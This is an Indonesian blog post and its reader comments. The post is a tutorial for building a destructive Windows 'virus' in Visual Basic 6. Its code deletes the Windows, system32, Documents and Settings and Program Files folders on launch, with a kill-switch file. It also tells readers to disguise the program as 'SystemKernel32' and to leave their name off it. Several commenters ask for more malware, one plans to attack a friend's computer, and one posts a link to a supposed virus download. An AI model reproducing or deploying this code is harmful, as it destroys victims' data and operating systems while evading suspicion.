Bikin Virus Kejam Sekali

Juli 21, 2007 at 1:22 pm 24 komentar

Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…

4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain

5. Jangan pernah naroh nama lu di nih virus… k?

6. compile deh… slese!

Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.

Entry filed under: Malware, Software, Windows. Tags: .

New Main CVD Download Cara instant membuat virus komputer dengan vbvimaker32

24 Komentar Add your own

  • 1. Jie  |  Juli 24, 2007 pukul 11:40 am

    jangan coba3 buat virus yach!!! yg namanya virus ntu smuanya sampah..!!! klo lu punya kreatifitas salurkan ke hal yg positif jng buat yg anh2 ok! Dosa lo.. bs msk neraka

    Balas
  • 2. Red èyé  |  Oktober 22, 2007 pukul 12:44 pm

    Thanx ya atas virusnya, wlaupn simple tapi kecil-kecil si cabe rawit.
    Aq mau lagi donk gmn cara untuk menyembunyikan dirinya di dalam file, kalo boleh kirim donk ke email aq………….!!!!!

    Balas
  • 3. taufan  |  November 23, 2007 pukul 9:40 am

    minta lagi dunk saya lagi belajar!!
    bagi2 ilmu yahh!!
    kalau boleh kirim ke email aq!1
    sebelum nya makasih banyak

    Balas
  • 4. s@@a  |  November 27, 2007 pukul 9:37 pm

    makasih yach tapi yang lainnya tolong kirim ke email aku yah

    Balas
  • 5. dicky  |  November 28, 2007 pukul 1:27 pm

    aaaa

    Balas
  • 6. dicky  |  November 28, 2007 pukul 1:30 pm

    thanx atas ilmuX
    bagi2 ya lain kali

    Balas
  • 7. Moundrow  |  Desember 2, 2007 pukul 9:45 pm

    Kalo virus yang cuma buat ganti wallpaper kode paan!
    kalo ada kirim2 donk ke email gw!

    salam kenal smua…

    Balas
  • 8. Pahlepi  |  Desember 6, 2007 pukul 12:55 pm

    caraa ngapusnya gmn ntar??
    repp
    ke email

    Balas
  • 9. hariyadi  |  Desember 8, 2007 pukul 11:05 am

    as.
    truzzzzzzz??? cara mengcompile nya g mna to mas???????
    tolong ya di jelaskan?
    tlng ya?
    by?
    ^_^

    Balas
  • 10. poel  |  Januari 7, 2008 pukul 11:21 pm

    Hmmm…..masih binun nih mas. tolong kirimkan tutorial yg lengkap ya mas ke email aku.thanks a/ilmunya……………

    Balas
  • 11. us  |  Mei 26, 2008 pukul 11:53 am

    mau virus ganas?
    download aj di http://www.driveway.com/x4n1a1o3o5
    resiko tanggung sendiri!!

    Balas
  • 12. heri  |  Juli 13, 2008 pukul 5:34 pm

    caranya pake program apa sih cara bikin virus terus terang aja nih mau iseng sama komputer unya temen abisnya reseh sih tuh orangnya

    Balas
  • 13. cahyo  |  Oktober 24, 2008 pukul 9:56 pm

    bang , bgi dong yang lebih jelas nya tentang nih virus…..

    kirim ke, email ane ya ?

    Balas
  • 14. cahyo  |  Oktober 24, 2008 pukul 9:59 pm

    bang bagi ynag lebih jelas nya dong…..

    Balas
  • 15. edwin  |  November 8, 2008 pukul 12:44 am

    apakah VB bisa diinstal di windows vista

    Balas
  • 16. edwin  |  November 8, 2008 pukul 12:45 am

    apakah VB bisa diinstal di windows vista? tolong dijawab

    Balas
  • 17. BRONTOK  |  November 12, 2008 pukul 11:51 am

    VIRUS CINTA

    Balas
  • 18. ch4m4nin  |  November 24, 2008 pukul 12:18 pm

    weeeeeeheeeeeeeeeeehebatsbangetsnih…….guesangattertarikbangetlo

    Balas
  • 19. aan  |  Desember 11, 2008 pukul 11:01 pm

    ngadu yuk buat virus
    ngaer gak bos

    Balas
  • 20. DJ karjo  |  Juli 20, 2009 pukul 7:56 pm

    boz bagi bagi donx
    subscribe lewat e-mail jga nga papa
    ok
    tak tunggu

    Balas
    • 21. admin  |  Juli 20, 2009 pukul 7:58 pm

      Sorry ya
      Neh blog dah tutup

      Balas
  • 22. cain oes  |  Januari 4, 2010 pukul 12:59 am

    vb itu program atau apa ya?…
    terus bikin form sekecil itu gimana caranya? tlng bls ke email ku ya cainoes@yahoo.com .tenxs

    Balas
  • 23. cup  |  Maret 18, 2010 pukul 8:02 am

    software apa yg gmpng cpt buat bkin vrus???

    Balas
  • 24. mazin  |  Oktober 15, 2010 pukul 3:15 am

    buat blajar si gpp….tp kacian buat yg g paham apa itu virus….tp sayangnya virus yg beredar sangat2 muda teratasi…segede apapun itu virus cukup 5 menit tersingkirkan…..aku sich g pernah pakai anti virus…karna anti virus yg sebenarnya bukan di software tp…di ujung jari kita masing2…jadi kekuatan dan kekebalan virus dan antinya itu tergantung telunjuk kita….kadang aku sampai kangen pingin kenal virus yg mematikan…tp sayang kompiku udah mau ketempelan virus…..

    Balas

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed


Juli 2007
S S R K J S M
« Jun   Agu »
 1
2345678
9101112131415
16171819202122
23242526272829
3031  

Arsip

Klik tertinggi

  • Tak ada

Blog Stats

  • 258,189 hits

Pos-pos Terbaru


%d blogger menyukai ini: